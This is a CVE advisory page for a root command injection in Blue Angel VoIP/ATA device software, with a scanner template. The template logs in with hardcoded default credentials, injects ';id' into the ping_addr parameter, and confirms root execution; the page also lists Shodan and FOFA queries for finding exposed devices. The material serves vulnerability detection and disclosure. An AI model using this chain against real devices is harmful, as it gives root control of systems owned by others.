CVE-2025-34033: Blue Angel Software Suite (5V Technologies) - OS Command Injection

2026-09-28 Unknown PoC Public

Description

Blue Angel 5V Technologies Blue Angel Software Suite through 20230920, as used in Analog Telephone Adapter (ATA) and Voice over IP (VoIP) devices, allows remote authenticated attackers to execute arbitrary OS commands as root via shell metacharacters in the ping_addr parameter to webctrl.cgi?action=pingtest_update.

PoC

id: CVE-2025-34033

info:
  name: Blue Angel Software Suite (5V Technologies) - OS Command Injection
  author: princechaddha,ritikchaddha
  severity: high
  description: |
    Blue Angel 5V Technologies Blue Angel Software Suite through 20230920, as used in Analog Telephone Adapter (ATA) and Voice over IP (VoIP) devices, allows remote authenticated attackers to execute arbitrary OS commands as root via shell metacharacters in the ping_addr parameter to webctrl.cgi?action=pingtest_update.
  impact: |
    Remote attackers with access to the management interface can authenticate using hardcoded backdoor credentials and execute arbitrary OS commands as root on the embedded Linux device, enabling full system compromise including credential exfiltration, backdoor installation, and network pivoting.
  remediation: |
    Change default credentials, block management ports (e.g. 9000), update firmware, and restrict admin access to trusted networks.
  reference:
    - https://www.exploit-db.com/exploits/46792
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34033
    - http://www.5vtechnologies.com
  classification:
    cve-id: CVE-2025-34033
    epss-score: 0.11206
    epss-percentile: 0.95819
    cwe-id: CWE-78
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
  metadata:
    max-request: 3
    vendor: 5vtechnologies
    product: blue_angel_software_suite
    verified: true
    fofa-query: 'title="Analog Telephone Adapter" && server="mini_httpd"'
    shodan-query: 'http.title:"Analog Telephone Adapter" http.headers:"mini_httpd"'
  tags: cve,cve2025,rce,cmdi,iot,blueangel,voip,authenticated,vkev

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        part: body
        words:
          - "/cgi-bin/webctrl.cgi?action=index_page"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/webctrl.cgi?action=login_authentication&redirect_action=sysinfo_page&login_username=blueangel&login_password=blueangel&B1=Login"

    matchers:
      - type: regex
        part: header
        regex:
          - "Set-Cookie:.*sesskey=sess[a-f0-9]+-blueangel"
        internal: true

    extractors:
      - type: regex
        name: session
        part: header
        regex:
          - "sesskey=[^;\\s\\r\\n]+"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1%3Bid&B1=PING"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid=0(root)"

      - type: word
        part: body
        words:
          - "round-trip"
# digest: 490a0046304402200895885723fd7e14c948857edf3b2d53e71afba32f0867a78bdf1aab06c055560220695c5e54b316e3956eb8aa2e87930067aa9d0bb2e3756f73c6ba1f7641002b60:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.